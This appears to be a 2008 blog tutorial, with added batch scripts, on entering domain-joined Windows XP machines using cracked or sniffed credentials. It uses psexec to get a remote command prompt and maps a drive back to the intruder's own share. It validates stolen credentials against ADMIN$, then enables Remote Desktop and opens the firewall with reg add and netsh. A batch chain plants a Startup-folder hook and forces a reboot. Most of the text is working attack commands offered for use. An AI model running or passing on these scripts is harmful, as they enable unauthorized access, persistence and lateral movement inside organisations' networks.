Thursday, January 24, 2008

Accessing WinXP Pro computers in a corporate environment.

In most corporate environments all the XP boxes are joined to a domain, which means the same credentials are reused on every machine and are constantly flying around the network. Let's say you got hold of some Windows password hashes and cracked them, following my last tutorial.

Or let's say you captured some cleartext passwords from HTTP traffic and suspect they are the same as the users' Windows passwords.

Typically RDP is already enabled on corporate machines, but if it isn't you can use psexec to get a foot in the door. Keep in mind what psexec needs: the account has to be a local administrator on the target, and SMB (TCP 445, specifically the ADMIN$ share) has to be reachable, because psexec copies its service binary there and starts it as a service.

http://www.microsoft.com/technet/sysinternals/security/psexec.mspx

Open a command prompt: click Start, then Run, type cmd and press Enter.

Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this or add psexec to the system path):

psexec \\machinename -u username cmd

It will prompt you for the password you have conveniently commandeered (or pass it on the command line with -p password so nothing prompts, which you will need for scripted use). Replace username with the actual account name, written as DOMAIN\username for a domain account. This starts a command prompt on your machine that is actually running on the other machine, so you now have \\machinename's cmd prompt open and can do any of your normal command prompt work from it. Psexec has an option (-c) for copying a program up when you run it, but it is a little fiddly. What I do instead is use the net command, inside that remote prompt, to map a drive back to a share on your own computer, like so:

net use r: \\breadstick\public /persistent:no

This maps drive R: to the shared folder named public on the computer breadstick. Now you can just type (remember, this is in the other computer's cmd prompt, not your own):

R:

to access it.
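Before you spend time on psexec it is worth checking that the captured credentials will actually get you in, and whether RDP is even off on the target. The batch file below is an added example, not part of the original post: it mounts the target's ADMIN$ share with the credentials (the same thing psexec does under the hood) and reads the fDenyTSConnections switch remotely through the Remote Registry service. The script name precheck.bat and its three arguments are my own; the machine name and account are whatever you captured.

```batch
@echo off
rem precheck.bat - added example, not from the original post.
rem Usage: precheck.bat machinename DOMAIN\username password
rem Assumes Windows XP Pro targets with Remote Registry running (the default).
setlocal
set TARGET=%1
set USER=%2
set PASS=%3
if "%PASS%"=="" (
    echo usage: %~nx0 machinename DOMAIN\username password
    exit /b 2
)

rem 1. psexec copies PSEXESVC.EXE into ADMIN$ (%SystemRoot% on the target)
rem    and starts it as a service. If these credentials cannot mount ADMIN$,
rem    psexec will fail with the same access denied.
net use \\%TARGET%\ADMIN$ %PASS% /user:%USER% /persistent:no >nul 2>&1
if errorlevel 1 (
    echo [-] Cannot mount \\%TARGET%\ADMIN$ as %USER%: wrong password, not a local admin, or SMB blocked.
    exit /b 1
)
echo [+] ADMIN$ mounted as %USER%: psexec has what it needs.

rem 2. Read the RDP switch over Remote Registry. 0x0 = connections allowed,
rem    0x1 = denied. reg.exe on XP prints "name  REG_DWORD  value", so the
rem    value is the third token.
set DENY=
for /f "tokens=3" %%v in ('reg query "\\%TARGET%\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ^| find /i "fDenyTSConnections"') do set DENY=%%v
if not defined DENY (
    echo [?] Could not read the key remotely. Is the Remote Registry service running on %TARGET%?
) else if "%DENY%"=="0x0" (
    echo [+] fDenyTSConnections=0x0: RDP is already enabled, try mstsc /v:%TARGET% before anything else.
) else (
    echo [-] fDenyTSConnections=%DENY%: RDP is off, go in with psexec and turn it on.
)

rem 3. Drop the session so a later net use with different credentials does not
rem    collide with it (error 1219).
net use \\%TARGET%\ADMIN$ /delete /y >nul 2>&1
endlocal
```

Step 2 only tells you about the registry switch; the Windows Firewall on XP SP2 can still block TCP 3389 even when the key says connections are allowed, and there is no remote built-in way to read that from the outside, so treat "enabled" as "worth a try with mstsc", not a guarantee.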

So you can run a silent install of VNC for some sweet GUI action, or, if you know nobody is actually sitting in front of the computer, you can create these three .bat files and run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

rem 0 = allow incoming Terminal Services connections. /f is needed because the value
rem already exists and reg add would otherwise stop and ask "overwrite?", which hangs
rem a psexec session nobody is typing into.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
mkdir c:\batter
rem %~dp0 is the folder this .bat lives in, so it works even if you ran it as r:\first.bat
copy "%~dp0second.bat" c:\batter
copy "%~dp0third.bat" c:\batter
rem Put second.bat in the Startup folder of the account psexec is running as; it runs
rem the next time that account logs on. Use %ALLUSERSPROFILE% instead if someone else
rem will be the one logging on.
copy c:\batter\second.bat "%USERPROFILE%\Start Menu\Programs\Startup\start.bat"
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening protocol=tcp port=3389 name=RemoteDesktop mode=enable
cd /d c:\batter
rem no "call" on purpose: control moves to third.bat and never comes back, so
rem third.bat can delete start.bat without anything still reading it
third.bat

third.bat

code:

rem remove the startup hook so this does not run again on every logon
del "%USERPROFILE%\Start Menu\Programs\Startup\start.bat"


This enables Remote Desktop on that machine so that you can remote into it. One caveat: start.bat sits in the Startup folder, so the firewall only opens once that user logs on interactively after the reboot; until then the registry switch is flipped but TCP 3389 is still blocked. If nobody is going to log on, just run the netsh line yourself from the psexec prompt, it works there just as well.
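The whole enable-RDP dance can also be done in one shot from the psexec session, without the reboot and the Startup-folder hand-off, and with a check at the end that the listener is really there. The batch file below is an added example, not the post's own three files: it assumes XP SP2 or later with the built-in Windows Firewall, that it is running as a local administrator on the target, and that you copied it there through ADMIN$. The file name enable-rdp.bat is mine; the RemoteDesktop rule name is the one from the post.

```batch
@echo off
rem enable-rdp.bat - added example, not from the original post.
rem Run on the target (through psexec) as a local administrator.

rem 1. Allow incoming Terminal Services connections (0 = allow). /f suppresses the
rem    overwrite prompt, which would otherwise hang the non-interactive session.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
if errorlevel 1 goto fail

rem 2. Open the firewall. The built-in Remote Desktop service entry covers TCP 3389;
rem    fall back to a plain port opening (the post's method) if that form is rejected.
netsh firewall set service type=remotedesktop mode=enable
if errorlevel 1 netsh firewall set portopening protocol=tcp port=3389 name=RemoteDesktop mode=enable

rem 3. Make sure Terminal Services is allowed to run and is running. An admin who
rem    disabled the service is the other common reason RDP "does not work".
sc config TermService start= auto >nul
sc start TermService >nul 2>&1

rem 4. Verify: is anything listening on 3389? If the service has not picked up the
rem    new setting, a reboot (what the original first.bat does unconditionally) fixes it.
netstat -an | find ":3389" | find "LISTENING" >nul
if errorlevel 1 (
    echo No listener on TCP 3389 yet, rebooting so Terminal Services re-reads the setting.
    shutdown -r -t 0
) else (
    echo RDP listener is up on TCP 3389. Connect with mstsc.
)
goto end

:fail
echo Could not write the Terminal Server key. Are you running as an administrator?
exit /b 1

:end
```

To get it onto the box, authenticate to the share and copy it up, then run it with the same account: copy enable-rdp.bat \\machinename\ADMIN$\ followed by psexec \\machinename -u username -p password cmd /c C:\WINDOWS\enable-rdp.bat. ADMIN$ is the target's Windows directory, so that is where the file lands. Step 4 is the part worth keeping even if you prefer the post's three-file version: a registry value that says "enabled" proves nothing until something is actually bound to 3389.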
